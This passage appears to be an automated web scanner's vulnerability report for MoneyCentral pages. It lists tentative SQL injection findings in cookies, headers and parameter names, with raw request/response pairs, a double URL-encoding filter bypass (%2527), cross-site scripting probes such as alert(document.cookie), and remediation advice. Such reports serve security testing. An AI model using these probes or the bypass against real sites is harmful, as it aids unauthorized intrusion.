User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32%2527%2527; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:41:31 GMT
Accept-Ranges: bytes
ETag: "803fbbe4b8abcb1:153c9"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:09:25 GMT
Content-Length: 600

function _usrChGetCrnt(key)
{var
opt=g_enumUsrCh[key].toString(16),rx=new RegExp("(?:=|%26)".concat(opt,"%3d([a-f0-9]+)"));return(g_usrChSrc.search(rx)!=-1)?parseInt(RegExp.$1,16):0;}
function _u
...[SNIP]...

1.41. http://redacted/inc/scr/userchoice.js [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/inc/scr/userchoice.js

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/scr/userchoice.js?v=634297056937135631 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:55:23 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/scr/userchoice.js?v=634297056937135631 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:41:31 GMT
Accept-Ranges: bytes
ETag: "803fbbe4b8abcb1:153c9"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 19:55:24 GMT
Content-Length: 600

function _usrChGetCrnt(key)
{var
opt=g_enumUsrCh[key].toString(16),rx=new RegExp("(?:=|%26)".concat(opt,"%3d([a-f0-9]+)"));return(g_usrChSrc.search(rx)!=-1)?parseInt(RegExp.$1,16):0;}
function _u
...[SNIP]...

1.42. http://redacted/inc/scr/userchoice.js [__qca cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/inc/scr/userchoice.js

Issue detail

The __qca cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __qca cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /inc/scr/userchoice.js?v=634297056937135631 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610'; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 15:09:28 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/scr/userchoice.js?v=634297056937135631 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610''; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:41:31 GMT
Accept-Ranges: bytes
ETag: "803fbbe4b8abcb1:153c9"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:09:28 GMT
Content-Length: 600

function _usrChGetCrnt(key)
{var
opt=g_enumUsrCh[key].toString(16),rx=new RegExp("(?:=|%26)".concat(opt,"%3d([a-f0-9]+)"));return(g_usrChSrc.search(rx)!=-1)?parseInt(RegExp.$1,16):0;}
function _u
...[SNIP]...

1.43. http://redacted/inc/scr/ww.js [mh cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/inc/scr/ww.js

Issue detail

The mh cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the mh cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the mh cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/scr/ww.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://money.redacted/investing?4755d%22%3E%3Cscript%3Ealert(1)%3C/script%3E10ee24922f0=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT%2527; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 17:33:50 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/scr/ww.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://money.redacted/investing?4755d%22%3E%3Cscript%3Ealert(1)%3C/script%3E10ee24922f0=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT%2527%2527; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:37:48 GMT
Accept-Ranges: bytes
ETag: "026d05fb8abcb1:161bf"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 17:33:50 GMT
Content-Length: 10184

String.prototype.WWtrim=function()
{return this.replace(/(^\s*)|(\s*$)/g,"");}
String.prototype.WWpeek=function()
{(/([^,;]+)$/i).exec(this);return RegExp.$1;}
String.prototype.WWhighlight=funct
...[SNIP]...

1.44. http://redacted/investor/StockRating/srsmain.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/investor/StockRating/srsmain.asp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor/StockRating/srsmain.asp?1%2527=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:05:55 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/StockRating/srsmain.asp?1%2527%2527=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:05:55 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

1.45. http://redacted/investor/StockRating/srstopstocksresults.aspx [MUID cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/investor/StockRating/srstopstocksresults.aspx

Issue detail

Remediation detail

Request 1

GET /investor/StockRating/srstopstocksresults.aspx?sco=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F%2527; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Connection: close
Date: Sun, 30 Jan 2011 02:15:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
Content-Type: text/html

<html><body><h1>Server is too busy</h1></body></html>

Request 2

GET /investor/StockRating/srstopstocksresults.aspx?sco=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F%2527%2527; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:15:28 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 55922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.46. http://redacted/investor/StockRating/srstopstocksresults.aspx [expid cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/investor/StockRating/srstopstocksresults.aspx

Issue detail

Request 1

GET /investor/StockRating/srstopstocksresults.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2';

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:05:33 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:05:33 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 56048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.47. http://redacted/investor/StockRating/srstopstocksresults.aspx [v1st cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/investor/StockRating/srstopstocksresults.aspx

Issue detail

Request 1

GET /investor/StockRating/srstopstocksresults.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4'; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:16c4d"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 18:05:23 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900
...[SNIP]...
<BR>

If you received this message in error, we apologize for the inconvenience.<BR>
...[SNIP]...

Request 2

GET /investor/StockRating/srstopstocksresults.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4''; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:05:24 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 56048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.48. http://redacted/investor/StockRating/srstopstocksresults.aspx [v1st cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/investor/StockRating/srstopstocksresults.aspx

Issue detail

Remediation detail

Request 1

GET /investor/StockRating/srstopstocksresults.aspx?sco=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4%2527; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:18 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/StockRating/srstopstocksresults.aspx?sco=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4%2527%2527; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:16:19 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 55922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.49. http://redacted/investor/charts/chartdl.aspx [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/investor/charts/chartdl.aspx

Issue detail

Remediation detail

Request 1

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00'
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; userCh=4=1&8=0&20=0

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 15:09:36 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00''
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; userCh=4=1&8=0&20=0

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 30 Jan 2011 15:09:37 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Length: 24676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.50. http://redacted/investor/charts/chartdl.aspx [__qca cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/investor/charts/chartdl.aspx

Issue detail

Request 1

GET /investor/charts/chartdl.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
